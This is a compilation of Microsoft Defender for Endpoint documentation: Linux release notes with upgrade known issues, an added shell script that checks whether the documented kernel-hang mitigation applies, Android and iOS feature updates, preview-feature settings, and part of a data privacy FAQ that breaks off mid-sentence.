While upgrading mdatp to version 101.94.13, you might notice that health is false, with health_issues as "no active supplementary event provider". This can happen due to misconfigured or conflicting auditd rules on existing machines. To mitigate the issue, the auditd rules on the existing machines need to be fixed. The following steps can help you identify such auditd rules (these commands need to be run as superuser). Make sure to back up the following file first: /etc/audit/rules.d/audit.rules, as these steps are only to identify failures.

Bash

echo -c >> /etc/audit/rules.d/audit.rules
augenrules --load

While upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate the problem in upgrading:

Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

Bash

sudo apt purge mdatp
sudo apt-get install mdatp

As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

In case you don't want to uninstall mdatp, you can disable real-time protection (rtp) and the mdatp service in sequence before upgrading. Caution: Some customers (<1%) are experiencing issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

Jan-2023 (Build: 101.94.13 | Release version: 30.122112.19413.0)

Released: January 10, 2023
Published: January 10, 2023
Build: 101.94.13
Release version: 30.122112.19413.0
Engine version: 1.1.19700.3
Signature version: 1.377.550.0

What's new

There are multiple fixes and new changes in this release:

Skip quarantine of threats in passive mode by default.
New config, nonExecMountPolicy, can now be used to specify the behavior of RTP on mount points marked as noexec.
New config, unmonitoredFilesystems, can be used to unmonitor certain filesystems.
Improved performance under high load and in speed test scenarios.
Fixes an issue with accessing SMB shares behind Cisco AnyConnect VPN connections.
Fixes an issue with Network Protection and SMB.
lttng performance tracing support.
TVM, eBPF, auditd, telemetry, and mdatp CLI improvements.
mdatp health now reports behavior_monitoring.
Other fixes.

Known issues

While upgrading mdatp to version 101.94.13, you might notice that health is false, with health_issues as "no active supplementary event provider". This can happen due to misconfigured or conflicting auditd rules on existing machines. To mitigate the issue, the auditd rules on the existing machines need to be fixed. The following steps can help you identify such auditd rules (these commands need to be run as superuser). Take a backup of the following file first: /etc/audit/rules.d/audit.rules, as these steps are only to identify failures.

Bash

echo -c >> /etc/audit/rules.d/audit.rules
augenrules --load

While upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.94.13. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate the problem in upgrading:

Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

Bash

sudo apt purge mdatp
sudo apt-get install mdatp

As an alternative to the above, you can follow the instructions to uninstall, then install the latest version of the package.

In case you don't want to uninstall mdatp, you can disable real-time protection (rtp) and the mdatp service in sequence before upgrading. Caution: Some customers (<1%) are experiencing issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

Nov-2022 (Build: 101.85.27 | Release version: 30.122092.18527.0)

Released: November 02, 2022
Published: November 02, 2022
Build: 101.85.27
Release version: 30.122092.18527.0
Engine version: 1.1.19500.2
Signature version: 1.371.1369.0

What's new

There are multiple fixes and new changes in this release:

V2 engine is the default with this release, and V1 engine bits are removed for enhanced security.
V2 engine supports a configuration path for AV definitions (mdatp definition set path).
Removed external package dependencies from the MDE package. Removed dependencies are libatomic1, libselinux, libseccomp, libfuse, and libuuid.
In case crash collection is disabled by configuration, the crash monitoring process isn't launched.
Performance fixes to optimally use system events for AV capabilities.
Stability improvement when restarting mdatp and for load epsext issues.
Other fixes.

Known issues

While upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.85.21. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate the problem in upgrading:

Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

Bash

sudo apt purge mdatp
sudo apt-get install mdatp

As an alternative approach, follow the instructions to uninstall, then install the latest version of the package.

In case you don't want to uninstall mdatp, you can disable real-time protection (rtp) and the mdatp service in sequence before upgrading. Caution: Some customers (<1%) are experiencing issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

Sep-2022 (Build: 101.80.97 | Release version: 30.122072.18097.0)

Released: September 14, 2022
Published: September 14, 2022
Build: 101.80.97
Release version: 30.122072.18097.0
Engine version: 1.1.19300.3
Signature version: 1.369.395.0

What's new

Fixes a kernel hang observed on select customer workloads running mdatp version 101.75.43. After RCA, this was attributed to a race condition while releasing the ownership of a sensor file descriptor. The race condition was exposed due to a recent product change in the shutdown path. Customers on newer kernel versions (5.1+) aren't impacted by this issue. For more information, see System hang due to blocked tasks in fanotify code.

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.80.97. This action should prevent the issue from occurring.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

After executing the commands, use your package manager to perform the upgrade.

As an alternative approach, follow the instructions to uninstall, then install the latest version of the package.

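
The kernel-hang known issue and its two mitigations are repeated in each of the release entries above. As an added example that is not part of the Microsoft release notes, the following POSIX shell script turns that guidance into a pre-upgrade check: it reads the installed mdatp version and the kernel release, decides whether the documented mitigation applies, and prints the matching path (disable real-time protection and the mdatp service first, or uninstall and reinstall). It assumes that mdatp health --field app_version prints the installed version (that switch is an assumption; the notes only show mdatp health), takes the affected versions to be exactly the two listed (101.75.43 and 101.78.13), and follows the Sep-2022 entry's statement that kernels 5.1 and later aren't impacted. When the kernel release can't be parsed, it errs on the side of recommending the mitigation.

```shell
#!/bin/sh
# Added example, not part of the Microsoft release notes: decide whether the
# documented kernel-hang mitigation applies before upgrading mdatp on Linux.
#
# Facts taken from the release notes:
#   - upgrading from 101.75.43 or 101.78.13 may hang the kernel (fanotify);
#   - kernels 5.1 and later are stated not to be impacted;
#   - mitigation: disable real-time protection and the mdatp service first,
#     or uninstall the old package and install the latest one.
# Assumption: `mdatp health --field app_version` prints the installed version.

HANG_AFFECTED_VERSIONS="101.75.43 101.78.13"

# needs_hang_mitigation VERSION -> prints yes|no
needs_hang_mitigation() {
    for affected in $HANG_AFFECTED_VERSIONS; do
        if [ "$1" = "$affected" ]; then
            echo yes
            return 0
        fi
    done
    echo no
}

# kernel_is_affected KERNEL_RELEASE -> prints yes|no|unknown
# Parses the leading major.minor of `uname -r` output, e.g. 4.18.0-425.el8.x86_64.
kernel_is_affected() {
    release="$1"
    major=${release%%.*}
    rest=${release#*.}
    minor=${rest%%[!0-9]*}
    case "$major" in ''|*[!0-9]*) echo unknown; return 0 ;; esac
    [ -n "$minor" ] || { echo unknown; return 0; }
    if [ "$major" -gt 5 ] || { [ "$major" -eq 5 ] && [ "$minor" -ge 1 ]; }; then
        echo no
    else
        echo yes
    fi
}

# plan_upgrade VERSION KERNEL_RELEASE -> prints one of:
#   mitigate     affected version on a kernel older than 5.1 (or unparseable)
#   likely-safe  affected version, but kernel 5.1+ (stated not to be impacted)
#   proceed      version not listed as affected
plan_upgrade() {
    if [ "$(needs_hang_mitigation "$1")" = no ]; then
        echo proceed
    elif [ "$(kernel_is_affected "$2")" = no ]; then
        echo likely-safe
    else
        echo mitigate
    fi
}

main() {
    if command -v mdatp >/dev/null 2>&1; then
        version=$(mdatp health --field app_version 2>/dev/null | tr -d '"')
    else
        # Constructed dry-run hook for hosts without mdatp installed.
        version="${MDATP_VERSION:-unknown}"
    fi
    kernel=$(uname -r)
    case "$(plan_upgrade "$version" "$kernel")" in
        mitigate)
            echo "mdatp $version on kernel $kernel: run the documented mitigation first:"
            echo "  sudo mdatp config real-time-protection --value=disabled"
            echo "  sudo systemctl disable mdatp"
            echo "  (or uninstall the old package and install the latest one)"
            ;;
        likely-safe)
            echo "mdatp $version on kernel $kernel: affected version, but kernel 5.1+ is stated not to be impacted"
            ;;
        *)
            echo "mdatp $version on kernel $kernel: no pre-upgrade mitigation documented"
            ;;
    esac
}

main
```

On a machine without mdatp the script falls back to the MDATP_VERSION environment variable, so the decision logic can be exercised (for example MDATP_VERSION=101.75.43 sh precheck.sh) before it is run on a production host.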
Aug-2022 (Build: 101.78.13 | Release version: 30.122072.17813.0)

Released: August 24, 2022
Published: August 24, 2022
Build: 101.78.13
Release version: 30.122072.17813.0
Engine version: 1.1.19300.3
Signature version: 1.369.395.0

What's new

Rolled back due to reliability issues.

Aug-2022 (Build: 101.75.43 | Release version: 30.122071.17543.0)

Released: August 2, 2022
Published: August 2, 2022
Build: 101.75.43
Release version: 30.122071.17543.0
Engine version: 1.1.19300.3
Signature version: 1.369.395.0

What's new

Added support for Red Hat Enterprise Linux version 9.0.
Added a new field in the output of mdatp health that can be used to query the enforcement level of the network protection feature. The new field is called network_protection_enforcement_level and can take one of the following values: audit, block, or disabled.
Addressed a product bug where multiple detections of the same content could lead to duplicate entries in the threat history.
Addressed an issue where one of the processes spawned by the product (mdatp_audisp_plugin) was sometimes not properly terminated when the service was stopped.
Other bug fixes.

Jul-2022 (Build: 101.73.77 | Release version: 30.122062.17377.0)

Released: July 21, 2022
Published: July 21, 2022
Build: 101.73.77
Release version: 30.122062.17377.0
Engine version: 1.1.19200.3
Signature version: 1.367.1011.0

What's new

Added an option to configure file hash computation.
From this build onwards, the product has the new antimalware engine by default.
Performance improvements for file copy operations.
Bug fixes.

Jun-2022 (Build: 101.71.18 | Release version: 30.122052.17118.0)

Released: June 24, 2022
Published: June 24, 2022
Build: 101.71.18
Release version: 30.122052.17118.0

What's new

Fix to support definitions storage in nonstandard locations (outside of /var) for v2 definition updates.
Fixed an issue in the product sensor used on RHEL 6 that could lead to an OS hang.
mdatp connectivity test was extended with an extra URL that the product requires to function correctly. The new URL is https://go.microsoft.com/fwlink/?linkid=2144709.
Up until now, the product log level wasn't persisted between product restarts. Beginning with this version, there's a new command-line tool switch that persists the log level. The new command is mdatp log level persist --level <level>.
Removed the dependency on python from the product installation package.
Performance improvements for file copy operations and processing of network events originating from auditd.
Bug fixes.

May-2022 (Build: 101.68.80 | Release version: 30.122042.16880.0)

Released: May 23, 2022
Published: May 23, 2022
Build: 101.68.80
Release version: 30.122042.16880.0

What's new

Added support for kernel version 2.6.32-754.47.1.el6.x86_64 when running on RHEL 6.
On RHEL 6, the product can now be installed on devices running Unbreakable Enterprise Kernel (UEK).
Fixed an issue where the process name was sometimes incorrectly displayed as unknown when running mdatp diagnostic real-time-protection-statistics.
Fixed a bug where the product sometimes was incorrectly detecting files inside the quarantine folder.
Fixed an issue where the mdatp command-line tool wasn't working when /opt was mounted as a soft link.
Performance improvements & bug fixes.

May-2022 (Build: 101.65.77 | Release version: 30.122032.16577.0)

Released: May 2, 2022
Published: May 2, 2022
Build: 101.65.77
Release version: 30.122032.16577.0

What's new

Improved the conflicting_applications field in mdatp health to show only the most recent 10 processes and also to include the process names. This makes it easier to identify which processes are potentially conflicting with Microsoft Defender for Endpoint for Linux.
Bug fixes.

Mar-2022 (Build: 101.62.74 | Release version: 30.122022.16274.0)

Released: Mar 24, 2022
Published: Mar 24, 2022
Build: 101.62.74
Release version: 30.122022.16274.0

What's new

Addressed an issue where the product would incorrectly block access to files
greater than 2 GB in size when running on older kernel versions
Bug fixes

Mar-2022 (Build: 101.60.93 | Release version: 30.122012.16093.0)

Released: Mar 9, 2022
Published: Mar 9, 2022
Build: 101.60.93
Release version: 30.122012.16093.0

What's new

This version contains a security update for CVE-2022-23278.

Mar-2022 (Build: 101.60.05 | Release version: 30.122012.16005.0)

Released: Mar 3, 2022
Published: Mar 3, 2022
Build: 101.60.05
Release version: 30.122012.16005.0

What's new

Added support for kernel version 2.6.32-754.43.1.el6.x86_64 for RHEL 6.10.
Bug fixes.

Feb-2022 (Build: 101.58.80 | Release version: 30.122012.15880.0)

Released: Feb 20, 2022
Published: Feb 20, 2022
Build: 101.58.80
Release version: 30.122012.15880.0

What's new

The command-line tool now supports restoring quarantined files to a location other than the one where the file was originally detected. This can be done through mdatp threat quarantine restore --id [threat-id] --path [destination-folder].
Beginning with this version, network protection for Linux can be evaluated on demand.
Bug fixes.

Jan-2022 (Build: 101.56.62 | Release version: 30.121122.15662.0)

Released: Jan 26, 2022
Published: Jan 26, 2022
Build: 101.56.62
Release version: 30.121122.15662.0

What's new

Fixed a product crash introduced in 101.53.02 that has impacted multiple customers.

Jan-2022 (Build: 101.53.02 | Release version: 30.121112.15302.0)

Released: Jan 8, 2022
Published: Jan 8, 2022
Build: 101.53.02
Release version: 30.121112.15302.0

What's new

Performance improvements & bug fixes

2021 releases
(Build: 101.52.57 | Release version: 30.121092.15257.0)

Build: 101.52.57
Release version: 30.121092.15257.0

What's new

Added a capability to detect vulnerable log4j jars in use by Java applications. The
machine is periodically inspected for running Java processes with loaded log4j jars.
The information is reported to the Microsoft Defender for Endpoint backend and is
exposed in the Vulnerability Management area of the portal.

(Build: 101.47.76 | Release version: 30.121092.14776.0)

Build: 101.47.76
Release version: 30.121092.14776.0

What's new

Added a new switch to the command-line tool to control whether archives are scanned during on-demand scans. This can be configured through mdatp config scan-archives --value [enabled/disabled]. By default, this setting is set to enabled.

Bug fixes

(Build: 101.45.13 | Release version: 30.121082.14513.0)

Build: 101.45.13
Release version: 30.121082.14513.0

What's new

Beginning with this version, we're bringing Microsoft Defender for Endpoint support to the following distros:
RHEL 6.7-6.10 and CentOS 6.7-6.10 versions.
Amazon Linux 2
Fedora 33 or higher

Bug fixes

(Build: 101.45.00 | Release version: 30.121072.14500.0)

Build: 101.45.00
Release version: 30.121072.14500.0

What's new

Added new switches to the command-line tool:

Control the degree of parallelism for on-demand scans. This can be configured through mdatp config maximum-on-demand-scan-threads --value [number-between-1-and-64]. By default, a degree of parallelism of 2 is used.
Control whether scans after security intelligence updates are enabled or disabled. This can be configured through mdatp config scan-after-definition-update --value [enabled/disabled]. By default, this setting is set to enabled.

Changing the product log level now requires elevation.
Bug fixes

(Build: 101.39.98 | Release version: 30.121062.13998.0)

Build: 101.39.98
Release version: 30.121062.13998.0

What's new

Performance improvements & bug fixes

(Build: 101.34.27 | Release version: 30.121052.13427.0)

Build: 101.34.27
Release version: 30.121052.13427.0

What's new

Performance improvements & bug fixes

(Build: 101.29.64 | Release version: 30.121042.12964.0)

Build: 101.29.64
Release version: 30.121042.12964.0

What's new

Beginning with this version, threats detected during on-demand antivirus scans triggered through the command-line client are automatically remediated. Threats detected during scans triggered through the user interface still require manual action.
mdatp diagnostic real-time-protection-statistics now supports two more switches:
--sort: sorts the output descending by total number of files scanned
--top N: displays the top N results (only works if --sort is also specified)
Performance improvements & bug fixes

(Build: 101.25.72 | Release version: 30.121022.12563.0)

Build: 101.25.72
Release version: 30.121022.12563.0

What's new

Microsoft Defender for Endpoint on Linux is now available in preview for US Government customers. For more information, see Microsoft Defender for Endpoint for US Government customers.
Fixed an issue where usage of Microsoft Defender for Endpoint on Linux on systems with FUSE filesystems was leading to an OS hang.
Performance improvements & other bug fixes.

(Build: 101.25.63 | Release version: 30.121022.12563.0)

Build: 101.25.63
Release version: 30.121022.12563.0

What's new

Performance improvements & bug fixes

(Build: 101.23.64 | Release version: 30.121021.12364.0)

Build: 101.23.64
Release version: 30.121021.12364.0

What's new

Performance improvement for the situation where an entire mount point is added to the antivirus exclusion list. Prior to this version, the product processed file activity originating from the mount point. Beginning with this version, file activity for excluded mount points is suppressed, leading to better product performance.
Added a new option to the command-line tool to view information about the last on-demand scan. To view information about the last on-demand scan, run mdatp health --details antivirus.
Other performance improvements & bug fixes.

(Build: 101.18.53)

Build: 101.18.53

What's new

EDR for Linux is now generally available

Added a new command-line switch (--ignore-exclusions) to ignore AV exclusions during custom scans (mdatp scan custom).
Extended mdatp diagnostic create with a new parameter (--path [directory]) that allows the diagnostic logs to be saved to a different directory.
Performance improvements & bug fixes.

What's new in Microsoft Defender for Endpoint on Android
Article • 10/25/2023

Applies to:

Microsoft Defender for Endpoint
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Important

Microsoft Defender for Endpoint's antimalware engine is now generally available. All users are required to have Microsoft Defender for Endpoint version 1.0.3815.0000 or later to use this new malware protection capability. Users on Microsoft Defender for Endpoint earlier than version 1.0.3815.0000 are sent notifications and in-app overlay messages to update their Microsoft Defender for Endpoint application. Users can click the link provided in the overlay message to go to the managed Play Store and update the application.

If users can't access the Play Store, the app can be updated through the Company Portal.


Device Tagging
Mobile Device Tagging is now generally available. This feature enables bulk tagging of mobile devices by allowing admins to set up tags via Intune. Admins can configure the device tags through Intune via configuration policies and push them to users' devices. Once the user installs and activates Defender, the client app passes the device tags to the Security Portal. The device tags appear against the devices in the Device Inventory.

This configuration is available for both enrolled (MDM) devices and unenrolled (MAM) devices. For more information, see Device Tagging (MDM) and Device Tagging (MAM).

Microsoft Defender for Endpoint on Company-owned personally enabled devices
MDE is now generally available on AE COPE devices. Enterprises can onboard devices in COPE mode and push MDE to users' devices through the Microsoft Intune admin center. With this support, Android Enterprise COPE devices get the full capabilities of our offering on Android, including:

Phishing and web protection.
Malware scanning.
Network protection (preview).
Additional breach prevention through integration with Microsoft Intune and Conditional Access.

Read the announcement here.

Privacy Controls
Microsoft Defender for Endpoint on Android enables privacy controls for both admins and end users. This includes the controls for enrolled (MDM) and unenrolled (MAM) devices. Admins can configure the privacy in the alert report, while end users can configure the information shared with their organization. For more information, see privacy controls (MDM) and privacy controls (MAM).

Optional Permissions and Disable Web Protection
Microsoft Defender for Endpoint on Android enables optional permissions in the onboarding flow. Currently, the permissions required by MDE are mandatory in the onboarding flow. With this feature, admins can deploy MDE on devices without enforcing the mandatory VPN and Accessibility permissions during onboarding. End users can onboard the app without the mandatory permissions and can later review these permissions. This feature is currently present only for unenrolled devices (MAM). For more information, see optional permissions.

Microsoft Defender on Android enterprise BYOD personal profile
Microsoft Defender for Endpoint is now supported on Android Enterprise personal profile (BYOD only) with all the key features, including malware scanning, protection from phishing links, network protection, and vulnerability management. This support is coupled with privacy controls to ensure user privacy on the personal profile. For more information, read the announcement and the deployment guide.

Network protection
Network Protection on Microsoft Defender for Endpoint is now available. Network
protection provides protection against rogue Wi-Fi related threats, rogue hardware like
pineapple devices and notifies the user if a related threat is detected. Users also see a
guided experience to connect to secure networks and change networks when they're
connected to an unsecure connection.

It includes several admin controls to offer flexibility, such as the ability to configure the
feature from within the Microsoft Intune admin center. Admins can also enable privacy
controls to configure the data that's sent by Defender for Endpoint from Android
devices. For more information, see network protection.

Note

Microsoft Defender is no longer supported for versions 1.0.3011.0302 or earlier. Users are requested to upgrade to the latest versions to keep their devices secure.

To update, users can use the following steps:

1. On your work profile, go to the Managed Play Store.
2. Tap the profile icon in the top right corner and select "Manage apps and device".
3. Locate MDE under updates available and select update. If you encounter any issues, submit in-app feedback.

Microsoft Defender for Endpoint is now Microsoft Defender in the Play store
Microsoft Defender for Endpoint is now available as Microsoft Defender in the Play Store. With this update, the app is available as a preview for consumers in the US region. Based on how you log in to the app, with your work or personal account, you have access to features for Microsoft Defender for Endpoint or for Microsoft Defender for individuals. For more information, see this blog.

Vulnerability Management
On January 25, 2022, we announced the general availability of Vulnerability Management on Android and iOS. For more information, see the Tech Community post here.

Upcoming permission changes for Microsoft Defender for Endpoint running Android 11 or later (Nov 2021)
Release build: 1.0.3501.0301
Release month: Nov 2021

Microsoft Defender for Endpoint has released this update, required by Google, to upgrade to Android API 30. With this change, the app prompts users for a new storage permission on devices running Android 11 or later. Users need to accept this new storage permission once they update the Defender app to release build 1.0.3501.0301 or later. This update ensures that Defender for Endpoint's app security feature functions without any disruption. For more information, review the following sections.

How will this affect your organization: These changes take effect if you're using
Microsoft Defender for Endpoint on devices running Android 11 or later and updated
Defender for Endpoint to release build 1.0.3501.0301 or later.

Note: The new storage permission cannot be set to "Auto Approve" by an admin through
Microsoft Intune. The user must take action to grant this permission.

User experience: Users receive a notification indicating a missing permission for
app security. If the user denies the permission, the App security functionality is
turned off on the device. If the user neither accepts nor denies the permission, they
continue to receive the prompt when unlocking the device or opening the app, until the
permission has been granted.

Note: If your organization is previewing the Tamper protection feature and the new
storage permission is not granted by the user within 7 days of updating to the
latest version, the user might lose access to corporate resources.

What you need to do to prepare:

Notify your users and helpdesk (as applicable) that users will need to accept the new
permissions when prompted after they have updated Defender for Endpoint to build
1.0.3501.0301 or later version. To accept the permissions, users should:

1. Tap on the Defender for Endpoint in-app notification or open the Defender for
Endpoint app. Users see a screen that lists the permissions needed. A green check
mark is missing next to the Storage permission.

2. Tap Begin.

3. Tap the toggle for Allow access to manage all files.

4. The device is now protected.

Note: This permission allows Microsoft Defender for Endpoint to access storage on the
user's device, which helps detect and remove malicious and unwanted apps. Microsoft
Defender for Endpoint accesses and scans Android app package (.apk) files only. On
devices with a Work Profile, Defender for Endpoint scans only work-related files.

Tip: Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

What's new in Microsoft Defender for Endpoint on iOS
Article • 01/05/2024

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Device Tagging
Mobile device tagging is now generally available. This feature enables bulk tagging of
mobile devices by letting admins set up tags via Intune. Admins configure the device
tags through Intune configuration policies and push them to users' devices. Once the
user installs and activates Defender, the client app passes the device tags to the
security portal, where they appear against the devices in the Device Inventory. For more
information, read Configure Device Tagging.

Vulnerability assessment of apps
Vulnerability assessment of apps on Microsoft Defender for Endpoint for iOS is now
generally available. Defender for Endpoint on iOS supports vulnerability assessment of
apps only for enrolled (MDM) devices. For more information, see Configure vulnerability
assessment of apps.

Network protection
Network protection on Microsoft Defender for Endpoint is now generally available.
Network protection provides protection against rogue Wi-Fi related threats and rogue
hardware such as Wi-Fi Pineapple devices, and notifies the user if a related threat is
detected. Users also see a guided experience to connect to secure networks and to change
networks when they're connected to an unsecure one.

It includes several admin controls to offer flexibility, such as the ability to configure the
feature from within the Microsoft Intune admin center. Admins can also enable privacy
controls to configure the data that's sent by Defender for Endpoint from iOS devices.
For more information, read Configure Network Protection.

Privacy Controls
Microsoft Defender for Endpoint on iOS enables Privacy Controls for both the Admins
and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM)
devices. Admins can configure the privacy in the phish alert report while End Users can
configure the information shared to their organization.

Optional Permissions and Disable Web Protection
Microsoft Defender for Endpoint on iOS enables optional permissions in the
onboarding flow. Previously, the permissions required by MDE were mandatory in the
onboarding flow. With this feature, admins can deploy MDE on BYOD devices without
enforcing the VPN permission during onboarding. End users can onboard
the app without the previously mandatory permissions and review them later. This
feature is currently available only for enrolled (MDM) devices.

With Disable Web Protection, customers who don't want to set up a VPN can
disable Web Protection and deploy MDE without that feature. Other MDE features
continue to work. This configuration is available for both enrolled (MDM)
devices and unenrolled (MAM) devices.

Integration with Tunnel
Microsoft Defender for Endpoint on iOS can now integrate with Microsoft Tunnel, a VPN
gateway solution, to deliver security and connectivity in a single app. Integration with
Tunnel provides a simpler, secure VPN experience on iOS with just one app. This feature
was earlier available only on Android. For more information, see the techcommunity
post.

Improved experience on supervised iOS devices
Microsoft Defender for Endpoint on iOS now has specialized capabilities on supervised
iOS/iPadOS devices, given the increased management capabilities the platform provides
on these types of devices. It can also provide Web Protection without setting
up a local VPN on the device. This gives end users a seamless experience while still
being protected from phishing and other web-based attacks. For details, see this
documentation.

Microsoft Defender for Endpoint is now Microsoft Defender in the App Store
Microsoft Defender for Endpoint is now available as Microsoft Defender in the App
Store. With this update, the app is available as a preview for consumers in the US region.
Based on whether you sign in to the app with a work or a personal account, you have
access to the features of Microsoft Defender for Endpoint or of Microsoft
Defender for individuals. For more information, see this blog.

Vulnerability Management
On January 25, 2022, we announced the general availability of vulnerability
management on Android and iOS. For more information, see the techcommunity post.

1.1.28250101
- Integration with Tunnel: Microsoft Defender for Endpoint on iOS can now
integrate with Microsoft Tunnel, a VPN gateway solution, to enable security and
connectivity in a single app. For more information, see Microsoft Tunnel Overview.
- Zero-touch onboarding for iOS devices enrolled through Microsoft Intune is
generally available. For more information, see Zero touch onboarding of Microsoft
Defender for Endpoint.
- Bug fixes.

1.1.24210103
- Resolved internet connectivity issues on supervised devices. For more information,
see Deploy Defender for Endpoint on enrolled iOS devices.
- Bug fixes.

1.1.23250104
- Performance optimizations: test battery performance with this version and let us
know your feedback.
- Zero-touch onboarding for enrolled iOS devices: with this version, the preview of
zero-touch onboarding for devices enrolled through Microsoft Intune has been
added. For details on setup and configuration, see this documentation.
- Privacy controls: configure privacy controls for the phish alert report. For more
information, see Configure iOS features.

1.1.23010101
- Bug fixes and performance improvements.
- Performance optimizations were made in this release. Test battery performance
with this version and let us know your feedback.

1.1.20240103
- Device Health card: the Device Health card notifies end users about any pending
software updates.
- Usability enhancements: end users can now disable the Defender for Endpoint
VPN from the Microsoft Defender app itself. Prior to this update, end users could
disable the VPN only from the Settings app.
- Bug fixes.

1.1.20020101
- UX enhancements: Microsoft Defender for Endpoint has a new look.
- Bug fixes.

1.1.17240101
- Support for Mobile Application Management (MAM) via Intune is generally
available with this version. For more information, see Microsoft Defender for
Endpoint risk signals available for your App protection policies.
- Jailbreak detection is generally available. For more information, see Setup
Conditional Access Policy based on device risk signals.
- Auto-setup of VPN profile for enrolled devices via Microsoft Intune is generally
available. For more information, see Auto-Setup VPN profile for enrolled iOS
devices.
- Bug fixes.

1.1.15140101
- Jailbreak detection is in preview. For more information, see Setup Conditional
Access Policy based on device risk signals.
- Auto-setup of VPN profile is in preview for enrolled devices via Microsoft Intune.
For more information, see Auto-Setup VPN profile for enrolled iOS devices.
- The Microsoft Defender ATP product name has now been updated to Microsoft
Defender for Endpoint in the App Store.
- Improved sign-in experience.
- Bug fixes.

1.1.15010101
- With this version, we're announcing support for iPadOS/iPad devices.
- Bug fixes.

Microsoft Defender for Endpoint preview features
Article • 01/19/2024

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The Defender for Endpoint service is constantly being updated to include new feature
enhancements and capabilities.

Learn about new features in the Defender for Endpoint preview release and be among
the first to try upcoming features by turning on the preview experience.

For more information on new capabilities that are generally available, see What's new in
Defender for Endpoint.

What you need to know
When working with features in public preview, these features:

- May have restricted or limited functionality. For example, the feature may only
apply to one platform.
- Typically go through feature changes before they're generally available (GA).
- Are fully supported by Microsoft.
- May only be available in selected geographic regions or cloud environments. For
example, the feature may not exist in the government cloud.
- Individual features in preview may have more usage and support restrictions. If so,
this information is typically noted in the feature documentation.
- The preview versions are provided with a standard support level, and can be used
for production environments.

Turn on preview features
You'll have access to upcoming features that you can provide feedback on to help
improve the overall experience before features are generally available.
Turn on the preview experience setting to be among the first to try upcoming features.

1. In the navigation pane, select Settings > Endpoints > Advanced features >
Preview features.
2. Toggle the setting between On and Off and select Save preferences.


Microsoft Defender for Endpoint data storage and privacy
Article • 08/23/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR
- Microsoft Defender for Business

Want to experience Defender for Endpoint? Sign up for a free trial.

This section covers some of the most frequently asked questions regarding privacy and
data handling for Defender for Endpoint.

Note: This article explains the data storage and privacy details related to Defender for
Endpoint and Defender for Business. For more information related to Defender for
Endpoint and other products and services like Microsoft Defender Antivirus and
Windows, see the Microsoft Privacy Statement and the Windows privacy FAQ.

What data does Microsoft Defender for Endpoint collect?
Microsoft Defender for Endpoint collects information from your configured devices
and stores it in a customer-dedicated and segregated tenant specific to the service for
administration, tracking, and reporting purposes.

Information collected includes file data (file names, sizes, and hashes), process data
(running processes, hashes), registry data, network connection data (host IPs and ports),
and device details (device identifiers, names, and the operating system version).

Microsoft stores this data securely in Microsoft Azure and maintains it in accordance
with Microsoft privacy practices and Microsoft Trust Center policies .

This data enables Defender for Endpoint to:

- Proactively identify indicators of attack (IOAs) in your organization
- Generate alerts if a possible attack was detected
- Provide your security operations with a view into devices, files, and URLs related to
threat signals from your network, enabling you to investigate and explore the
presence of security threats on the network.

Microsoft doesn't use your data for advertising.

Data protection and encryption
The Defender for Endpoint service uses data protection technologies that are based on
Microsoft Azure infrastructure.

There are various aspects relevant to data protection that the service takes care of.
Encryption is one of the most critical aspects, and it includes data encryption at rest,
encryption in transit, and key management with Azure Key Vault. For more information on
other technologies used by the Defender for Endpoint service, see Azure encryption
overview.

In all scenarios, data is encrypted using 256-bit AES encryption at a minimum.

Data storage location
Defender for Endpoint operates in the Microsoft Azure data centers in the European
Union, the United Kingdom, the United States, or in Australia. Customer data collected
by the service may be stored in: (a) the geo-location of the tenant as identified during
provisioning or, (b) the geo-location as defined by the data storage rules of an online
service if this online service is used by Defender for Endpoint to process such data. For
more information, see Where your Microsoft 365 customer data is stored.

Customer data in pseudonymized form may also be stored in the central storage and
processing systems in the United States.

Select Need help? in the Microsoft Defender portal to contact Microsoft support about
provisioning Microsoft Defender XDR in a different data center location.

Data sharing for Microsoft Defender for Endpoint
Microsoft Defender for Endpoint shares data, including customer data, among the
following Microsoft products, also licensed by the customer:

- Microsoft Sentinel
- Microsoft Tunnel for Mobile Application Management - Android
- Microsoft Defender for Cloud
- Microsoft Defender for Identity

Is my data isolated from other customer data?
Yes, your data is isolated through access authentication and logical segregation based
on customer identifier. Each customer can only access data collected from its own
organization, and the generic data that Microsoft provides.

How does Microsoft prevent malicious insider activities and abuse of high privilege roles?
Microsoft developers and administrators have, by design, been given sufficient
privileges to carry out their assigned duties to operate and evolve the service. Microsoft
deploys combinations of preventive, detective, and reactive controls, including the
following mechanisms, to help protect against unauthorized developer and/or
administrative activities:

- Tight access control to sensitive data
- Combinations of controls that greatly enhance independent detection of malicious
activity
- Multiple levels of monitoring, logging, and reporting

Additionally, Microsoft conducts background verification checks of certain operations
